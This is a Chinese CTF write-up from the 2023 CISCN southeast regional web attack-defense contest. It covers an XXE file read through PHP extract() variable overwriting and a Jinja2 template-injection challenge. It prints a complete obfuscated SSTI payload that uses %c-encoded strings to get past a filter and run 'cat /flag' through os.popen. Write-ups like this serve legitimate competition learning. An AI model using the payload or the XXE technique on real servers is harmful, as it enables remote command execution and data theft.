2023ciscn华东南分区web writeup

首发于i春秋论坛：https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=63447#lastpost
writered by hardlic

队名:G0D玛卡巴卡

总分:12241
排名:55

由于也只是第一次打，对赛制和赛题都不太熟悉，而且题目的难度也不小，华东男不愧是小决赛，一共86轮，每轮十分钟，分两天，一共是二十道题 十题web 十题pwn，大体赛制网上都有，唯一就是patch上和进攻上每回合都有分，但是进攻比修复难的多，比的就是谁快了，也很吃队伍的配置，没有pwn真滴痛，来个pwn✌带带。
第一天大爆0 ，只写了一题很easy的web防守题，第一天就在56名了。第二天的难度比第一天简单一点，也有了些机会，第二天很关键的在最后一两个小时连续写出web的两道攻防，勉强带着三个茶歇手挤进三等奖了，狠狠被薄纱，前面的佬们20w+是我们的二十倍55，还是太菜了,值得说的是茶歇很好吃！！！下次还要ak茶歇区 ,好吧那就简单写个wp记录一下这次长达两天的awdp叭。

day1

hack

由于是第二天写的wp所以第一天的题目看不见了55，根据提示写出防御方式，加个return


加上去，再写一个sh(sh命令会给的)和命令tar压缩命令打包一下传上去就防好了（后面打包都差不多不多说力）

day2

ezphp

一共三个有用的php，一个index.php login.php register.php 以及一个function.php还有一个config.php配置文件封装了一些可用的函数,

patch

在config.php这个地方，发现了一个防止xxe注入的设置，直接将这个true改成false就可避免外部实体注入，patch成功力！

attack

攻击这是这时候已经只剩一个小时十分钟了，也就是六轮多一点然后还差3.5k分这样，这时候一轮才只能加350分 然后这个的攻击分一轮加270分，也就是如果打完这题一轮加650分，然后就仔细观察发现这里有个extract变量覆盖，他能够覆盖上面的xml模板然后

所以只要将模板的user_xml_format中的username覆盖成一个文件读取就可以力
最后通过一个密码错误带出username的xxe回显

Ciscn_search_Engine

patch and defense

一个ssti基础模板注入
源代码给了，唯一就是不知道waf函数，通过尝试发现没有ban attr，通过绕过防火墙代码得到flag，sorry55,防守就加上过滤attr就完成力

shell_payload="{%print(((((((((((((((((((request|attr((('%c'*11)%(97,112,112,108,105,99,97,116,105,111,110))))|attr((('%c'*8)%(95,95,115,101,108,102,95,95))))|attr((('%c'*11)%(106,115,111,110,95,109,111,100,117,108,101)))).JSONEncoder).default)|attr((('%c'*11)%(95,95,103,108,111,98,97,108,115,95,95))))|attr((('%c'*11)%(95,95,103,101,116,105,116,101,109,95,95))))((('%c'*11)%(99,117,114,114,101,110,116,95,97,112,112))))|attr((('%c'*6)%(99,111,110,102,105,103))))|attr((('%c'*9)%(95,95,99,108,97,115,115,95,95))))|attr((('%c'*8)%(95,95,105,110,105,116,95,95))))|attr((('%c'*11)%(95,95,103,108,111,98,97,108,115,95,95))))|attr((('%c'*11)%(95,95,103,101,116,105,116,101,109,95,95))))((('%c'*2)%(111,115))))|attr((('%c'*5)%(112,111,112,101,110))))((('%c'*9)%(99,97,116,32,47,102,108,97,103))))|attr((('%c'*4)%(114,101,97,100))))()))%}" //cat .flag

后记

就写了俩题攻防和一题白给的，太菜了，师傅们明年再战，争取明年冲刺一等奖55